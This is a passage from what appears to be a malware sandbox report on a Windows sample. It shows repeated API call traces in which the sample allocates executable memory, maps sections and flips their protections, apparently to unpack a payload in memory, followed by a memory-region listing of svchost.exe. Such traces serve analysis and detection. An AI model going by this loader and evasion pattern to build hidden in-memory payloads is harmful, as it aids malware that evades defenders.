CloseHandle (hObject=0x664) returned 1 [0665.409] CloseHandle (hObject=0x660) returned 1 [0665.409] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0665.409] GetCurrentThreadId () returned 0xf88 [0665.409] free (_Block=0x3a2df8) [0665.409] free (_Block=0x3a2e08) [0665.409] GetCurrentThreadId () returned 0xf88 [0665.410] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0665.410] malloc (_Size=0x5f5e100) returned 0x33d0020 [0666.729] free (_Block=0x33d0020) [0667.355] atoi (_Str="64") returned 64 [0667.356] atoi (_Str="8192") returned 8192 [0667.356] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x3110000 [0667.362] malloc (_Size=0x3afd) returned 0x20c0da8 [0667.362] malloc (_Size=0x3afd) returned 0x20c49b0 [0667.377] GetLastError () returned 0x0 [0667.377] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0667.377] GetCurrentThreadId () returned 0xf88 [0667.377] GetCurrentThreadId () returned 0xf88 [0667.377] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0667.377] GetCurrentThreadId () returned 0xf88 [0667.377] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x660 [0667.377] GetCurrentProcess () returned 0xffffffff [0667.378] GetCurrentThread () returned 0xfffffffe [0667.378] GetCurrentProcess () returned 0xffffffff [0667.378] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x20ea574, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x20ea574*=0x664) returned 1 [0667.378] GetThreadPriority (hThread=0x664) returned 0 [0667.379] SetLastError (dwErrCode=0x0) [0667.379] GetLastError () returned 0x0 [0667.379] realloc (_Block=0x0, _Size=0x4) returned 0x3a2e08 [0667.379] realloc (_Block=0x0, _Size=0x1) returned 0x3a2df8 [0667.379] SetLastError (dwErrCode=0x0) [0667.379] GetNativeSystemInfo (in: lpSystemInfo=0x31df4b8 | out: lpSystemInfo=0x31df4b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0667.379] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0667.380] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x3140000 [0667.380] GetProcessHeap () returned 0x530000 [0667.380] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83ca0 [0667.380] VirtualAlloc (lpAddress=0x3140000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x3140000 [0667.381] VirtualAlloc (lpAddress=0x3141000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x3141000 [0667.384] VirtualAlloc (lpAddress=0x3164000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x3164000 [0667.385] VirtualAlloc (lpAddress=0x3165000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x3165000 [0667.385] VirtualAlloc (lpAddress=0x3166000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x3166000 [0667.386] GetLastError () returned 0x1e7 [0667.386] SetLastError (dwErrCode=0x1e7) [0667.386] GetLastError () returned 0x1e7 [0667.386] SetLastError (dwErrCode=0x1e7) [0667.386] GetLastError () returned 0x1e7 [0667.386] SetLastError (dwErrCode=0x1e7) [0667.386] GetLastError () returned 0x1e7 [0667.386] SetLastError (dwErrCode=0x1e7) [0667.386] VirtualProtect (in: lpAddress=0x3141000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x31df390 | out: lpflOldProtect=0x31df390*=0x4) returned 1 [0667.393] GetLastError () returned 0x1e7 [0667.393] SetLastError (dwErrCode=0x1e7) [0667.393] GetLastError () returned 0x1e7 [0667.393] SetLastError (dwErrCode=0x1e7) [0667.393] GetLastError () returned 0x1e7 [0667.393] SetLastError (dwErrCode=0x1e7) [0667.393] VirtualProtect (in: lpAddress=0x3164000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x31df390 | out: lpflOldProtect=0x31df390*=0x4) returned 1 [0667.393] GetLastError () returned 0x1e7 [0667.393] SetLastError (dwErrCode=0x1e7) [0667.393] GetLastError () returned 0x1e7 [0667.393] SetLastError (dwErrCode=0x1e7) [0667.393] GetLastError () returned 0x1e7 [0667.393] SetLastError (dwErrCode=0x1e7) [0667.394] VirtualProtect (in: lpAddress=0x3165000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x31df390 | out: lpflOldProtect=0x31df390*=0x4) returned 1 [0667.394] GetLastError () returned 0x1e7 [0667.394] SetLastError (dwErrCode=0x1e7) [0667.394] GetLastError () returned 0x1e7 [0667.394] SetLastError (dwErrCode=0x1e7) [0667.394] GetLastError () returned 0x1e7 [0667.394] SetLastError (dwErrCode=0x1e7) [0667.394] VirtualFree (lpAddress=0x3166000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0667.397] GetLastError () returned 0x1e7 [0667.397] SetLastError (dwErrCode=0x1e7) [0667.397] GetLastError () returned 0x1e7 [0667.397] SetLastError (dwErrCode=0x1e7) [0667.398] GetLastError () returned 0x1e7 [0667.398] SetLastError (dwErrCode=0x1e7) Thread: id = 158 os_tid = 0xfc8 [0597.804] malloc (_Size=0x5f5e100) returned 0x33d0020 [0599.126] free (_Block=0x33d0020) [0599.696] atoi (_Str="64") returned 64 [0599.696] atoi (_Str="8192") returned 8192 [0599.696] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2fe0000 [0599.699] malloc (_Size=0x3afd) returned 0x20b9598 [0599.699] malloc (_Size=0x3afd) returned 0x20bd1a0 [0599.710] GetLastError () returned 0x0 [0599.710] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0599.710] GetCurrentThreadId () returned 0xfc8 [0599.710] calloc (_Count=0x1, _Size=0xc0) returned 0x20ea628 [0599.710] GetCurrentThreadId () returned 0xfc8 [0599.710] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0599.710] GetCurrentThreadId () returned 0xfc8 [0599.710] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x658 [0599.710] GetCurrentProcess () returned 0xffffffff [0599.710] GetCurrentThread () returned 0xfffffffe [0599.710] GetCurrentProcess () returned 0xffffffff [0599.711] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x20ea63c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x20ea63c*=0x65c) returned 1 [0599.711] GetThreadPriority (hThread=0x65c) returned 0 [0599.711] SetLastError (dwErrCode=0x0) [0599.711] GetLastError () returned 0x0 [0599.711] realloc (_Block=0x0, _Size=0x4) returned 0x3a2e18 [0599.711] realloc (_Block=0x0, _Size=0x1) returned 0x3a2e28 [0599.711] SetLastError (dwErrCode=0x0) [0599.711] GetNativeSystemInfo (in: lpSystemInfo=0x33cfa54 | out: lpSystemInfo=0x33cfa54*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0599.711] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0599.711] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x30e0000 [0599.712] GetProcessHeap () returned 0x530000 [0599.712] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83d20 [0599.712] VirtualAlloc (lpAddress=0x30e0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x30e0000 [0599.712] VirtualAlloc (lpAddress=0x30e1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x30e1000 [0599.715] VirtualAlloc (lpAddress=0x3104000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x3104000 [0599.716] VirtualAlloc (lpAddress=0x3105000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x3105000 [0599.716] VirtualAlloc (lpAddress=0x3106000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x3106000 [0599.716] GetLastError () returned 0x1e7 [0599.716] SetLastError (dwErrCode=0x1e7) [0599.716] GetLastError () returned 0x1e7 [0599.716] SetLastError (dwErrCode=0x1e7) [0599.716] GetLastError () returned 0x1e7 [0599.716] SetLastError (dwErrCode=0x1e7) [0599.716] GetLastError () returned 0x1e7 [0599.716] SetLastError (dwErrCode=0x1e7) [0599.716] VirtualProtect (in: lpAddress=0x30e1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x33cf92c | out: lpflOldProtect=0x33cf92c*=0x4) returned 1 [0599.720] GetLastError () returned 0x1e7 [0599.720] SetLastError (dwErrCode=0x1e7) [0599.720] GetLastError () returned 0x1e7 [0599.720] SetLastError (dwErrCode=0x1e7) [0599.720] GetLastError () returned 0x1e7 [0599.720] SetLastError (dwErrCode=0x1e7) [0599.720] VirtualProtect (in: lpAddress=0x3104000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x33cf92c | out: lpflOldProtect=0x33cf92c*=0x4) returned 1 [0599.721] GetLastError () returned 0x1e7 [0599.721] SetLastError (dwErrCode=0x1e7) [0599.721] GetLastError () returned 0x1e7 [0599.721] SetLastError (dwErrCode=0x1e7) [0599.721] GetLastError () returned 0x1e7 [0599.721] SetLastError (dwErrCode=0x1e7) [0599.721] VirtualProtect (in: lpAddress=0x3105000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x33cf92c | out: lpflOldProtect=0x33cf92c*=0x4) returned 1 [0599.721] GetLastError () returned 0x1e7 [0599.721] SetLastError (dwErrCode=0x1e7) [0599.721] GetLastError () returned 0x1e7 [0599.721] SetLastError (dwErrCode=0x1e7) [0599.721] GetLastError () returned 0x1e7 [0599.721] SetLastError (dwErrCode=0x1e7) [0599.721] VirtualFree (lpAddress=0x3106000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0599.724] GetLastError () returned 0x1e7 [0599.724] SetLastError (dwErrCode=0x1e7) [0599.724] GetLastError () returned 0x1e7 [0599.724] SetLastError (dwErrCode=0x1e7) [0599.724] GetLastError () returned 0x1e7 [0599.724] SetLastError (dwErrCode=0x1e7) Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xdb4d000" os_pid = "0x2c0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7ac" [0xc000000f], "LOCAL" [0x7] Region: id = 1922 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1923 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1924 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1925 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1926 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1927 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1928 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1929 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1930 start_va = 0x160000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1931 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1932 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1933 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1934 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1935 start_va = 0x510000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1936 start_va = 0x6a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1937 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1938 start_va = 0x7a0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1939 start_va = 0x7c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1940 start_va = 0x840000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1941 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1942 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1943 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1944 start_va = 0xd50000 end_va = 0xdb1fff monitored = 0 entry_point = 0xd608d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1945 start_va = 0xdc0000 end_va = 0xdc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1946 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1947 start_va = 0xde0000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 1948 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1949 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1950 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 1951 start_va = 0xe20000 end_va = 0xe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1952 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 1953 start_va = 0xf30000 end_va = 0xf30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 1954 start_va = 0xf40000 end_va = 0xf41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1955 start_va = 0xf50000 end_va = 0xf50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 1956 start_va = 0xf60000 end_va = 0xf60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 1957 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1958 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1959 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 1960 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 1961 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 1962 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 1963 start_va = 0x13e0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 1964 start_va = 0x14d0000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 1965 start_va = 0x1550000 end_va = 0x174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1966 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 1967 start_va = 0x18f0000 end_va = 0x196ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 1968 start_va = 0x1990000 end_va = 0x1a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 1969 start_va = 0x1a40000 end_va = 0x1abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 1970 start_va = 0x1af0000 end_va = 0x1b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 1971 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 1972 start_va = 0x1cf0000 end_va = 0x20f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 1973 start_va = 0x2100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1974 start_va = 0x2510000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 1975 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 1976 start_va = 0x2670000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1977 start_va = 0x2840000 end_va = 0x28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1978 start_va = 0x2950000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 1979 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 1980 start_va = 0x2ad0000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1981 start_va = 0x2b50000 end_va = 0x2c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 1982 start_va = 0x2c50000 end_va = 0x344ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 1983 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1984 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1985 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1986 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1987 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1988 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1989 start_va = 0xff030000 end_va = 0xff082fff monitored = 0 entry_point = 0xff043310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1990 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1991 start_va = 0xff430000 end_va = 0xff491fff monitored = 0 entry_point = 0xff4408d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1992 start_va = 0x7fef08c0000 end_va = 0x7fef09e4fff monitored = 0 entry_point = 0x7fef0911570 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1993 start_va = 0x7fef09f0000 end_va = 0x7fef0a0bfff monitored = 0 entry_point = 0x7fef09f1060 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1994 start_va = 0x7fef0c10000 end_va = 0x7fef0cbdfff monitored = 0 entry_point = 0x7fef0c14104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1995 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1996 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1997 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1998 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1999 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2000 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2001 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2002 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2003 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2004 start_va = 0x7fef91e0000 end_va = 0x7fef921afff monitored = 0 entry_point = 0x7fef91e4520 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2005 start_va = 0x7fef9220000 end_va = 0x7fef9270fff monitored = 0 entry_point = 0x7fef922f6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2006 start_va = 0x7fef9290000 end_va = 0x7fef9297fff monitored = 0 entry_point = 0x7fef929284c region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2007 start_va = 0x7fef92a0000 end_va = 0x7fef92a9fff monitored = 0 entry_point = 0x7fef92a1adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2008 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2009 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2010 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2011 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2012 start_va = 0x7fefb720000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb736acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2013 start_va = 